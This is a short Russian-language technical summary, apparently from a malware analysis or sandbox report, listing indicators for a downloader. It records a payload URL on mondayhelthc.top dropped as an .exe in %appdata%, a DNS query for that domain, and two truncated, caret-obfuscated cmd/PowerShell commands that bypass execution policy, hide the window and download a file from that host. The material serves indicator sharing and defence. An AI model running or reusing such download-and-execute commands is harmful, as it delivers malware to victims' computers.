Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^Wer^SHelL^.^ex^E^ ^-e^XecU^TIoNpo^L^iCY^ ^ByPaS^s^ -^noprOfiLE^ -WI^n^dOwS^T^yle^ ^H^i^Dde^N^ (^nEw-^obje^CT s^YS^T^Em^.^N^E^T.^W^EbclIeN^T).DowN^LoA^D^Fi^L^e('http://mondayhe...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "p^O^Wer^SHelL^.^ex^E^ ^-e^XecU^TIoNpo^L^iCY^ ^ByPaS^s^ -^noprOfiLE^ -WI^n^dOwS^T^yle^ ^H^i^Dde^N^ (^nEw-^obje^CT s^YS^T^Em^.^N^E^T.^W^EbclIeN^T).DowN^LoA^D^Fi^L^e('http://mondayhe...' (со скрытым окном)